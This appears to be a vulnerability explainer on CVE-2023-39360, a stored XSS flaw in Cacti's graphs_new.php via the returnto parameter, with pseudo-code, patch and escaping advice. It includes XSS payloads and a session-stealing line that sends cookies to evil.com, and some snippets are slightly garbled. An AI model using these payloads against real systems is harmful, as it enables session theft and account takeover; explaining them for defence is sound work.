Cacti is a very popular open source operational monitoring tool used to collect and visualize network and server metrics. Recently, in 2023, a serious Stored Cross-Site Scripting (XSS) vulnerability was discovered affecting certain versions of Cacti. Specifically, CVE-2023-39360 allows an authenticated user to inject malicious script into the application, which can then be executed in the browser of anyone viewing the poisoned data.
This post will guide you through the vulnerability, including how it arises in code, how it can be exploited, and how to protect yourself. We’ll use simple, straightforward language with example code and trusted references.
What is CVE-2023-39360?
CVE-2023-39360 is a vulnerability in Cacti that allows a logged-in attacker to store a script payload that will run for other users later. Specifically, in some versions of Cacti before 1.2.25, improper handling of the returnto parameter in the graphs_new.php file lets an attacker store a JavaScript payload. This means any admin or user who later clicks or is redirected to the poisoned data can have the attacker's code execute in their browser.
Where’s the Problem in the Code?
The vulnerable code is found in graphs_new.php. This page handles creating new graph definitions and allows for redirection with the returnto parameter. Although Cacti developers put some validation checks in place, the returnto parameter gets passed directly to the form_save_button function without sufficient escaping.
Here’s a pseudo-code snippet showing the problem area
// graphs_new.php
$allowed_returnto = array('host.php', ...);
$returnto = get_request_var('returnto');
// Some checks here
if (strpos($returnto, 'host.php') !== false) {
// passes check even if extra payload is present!
form_save_button('Save', 'cancel', $returnto, ...);
}
// In form_save_button, $returnto is used unsanitized!
If an attacker adds JavaScript to returnto (for example via URL or a form value), this input will be stored and later rendered as part of the web interface. When another user interacts with the affected data, the script will run in their browser context.
Craft a Malicious URL or POST Request
`
http:///graphs_new.php?returnto=host.php%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
`
host.php">
Stored Attack
- Any user (often an admin) who is sent back or redirected by the app to this value will trigger the stored <script> code.
Why Does This Work?
- The check only confirms that host.php is *present* in returnto, not that it equals host.php or is at the start.
Change the payload in the URL or form
host.php"><img src=x onerror=alert('XSS');>
Or sneakier, to steal the session
host.php"><script>fetch('https://evil.com?cookie='+document.cookie)</script>
Official Patch
- Update to Cacti version 1.2.25 or later. Download here.
- The maintainers add proper validation and escaping so untrusted input can’t execute scripts anymore.
Workaround for Unpatched Systems
If you cannot upgrade immediately, sanitize and filter all user-controllable output. For example, you can modify templates to ensure any output of parameters like returnto is escaped using something like:
echo htmlspecialchars($returnto, ENT_QUOTES, 'UTF-8');
Also, review your Cacti configuration and restrict user access only to trusted users.
References and Further Reading
- Cacti Security Updates
- GitHub Patch commit for 1.2.25
- CVE-2023-39360 at NVD
- OWASP XSS Prevention Cheatsheet
Summary
CVE-2023-39360 is a stored XSS flaw in Cacti’s graphs_new.php caused by improper handling of the returnto parameter. If left unpatched, attackers can poison stored data and run malicious scripts on any user’s browser. Update your Cacti installation now or filter untrusted output to stay secure. If you manage multiple Cacti servers or serve public users, this is especially critical.
Stay safe and always be vigilant about software updates!
Timeline
Published on: 09/05/2023 21:15:46 UTC
Last modified on: 11/03/2023 21:15:14 UTC